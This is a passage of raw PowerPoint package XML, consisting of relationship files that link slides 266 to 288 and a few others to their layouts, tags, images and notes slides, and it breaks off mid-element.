<file path=ppt/slides/_rels/slide266.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2491.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1036.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1035.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1034.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1033.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide267.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2501.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1040.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1039.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1038.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1037.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide268.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2511.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1041.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide269.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1045.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1044.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2521.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1043.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1042.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout101.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag99.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag98.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag97.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag96.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide270.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2531.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide271.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2541.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide272.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide27.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2551.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1051.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1050.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1049.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1048.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1047.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1046.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide273.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1060.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1059.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1058.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1057.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1056.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1055.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1054.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1053.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2561.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1064.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1063.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1062.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1061.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1052.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide274.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2572.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1067.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1066.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1065.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide275.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2582.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1070.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1069.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1068.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide276.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2591.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1074.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1073.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1072.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1071.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide277.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2601.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1079.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1078.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1077.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1076.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1075.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2611.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1083.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1082.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1081.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1080.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide279.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2621.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1087.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1086.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1085.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1084.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout111.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag103.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag102.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag100.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide280.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2631.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1091.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1090.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1089.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1088.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide281.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2641.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1095.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1094.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1093.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1092.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide282.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2651.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1099.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1098.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1097.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1096.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide283.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2661.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1103.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1102.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1101.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1100.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide284.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2671.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1107.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1106.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1105.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1104.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide285.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2681.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1111.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1110.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1109.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1108.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide286.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2691.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1115.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1114.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1113.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1112.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide287.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2701.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1116.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide288.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1120.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1119.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2711.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.svg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1118.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.svg"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.svg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.svg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.svg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.svg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.svg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1117.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 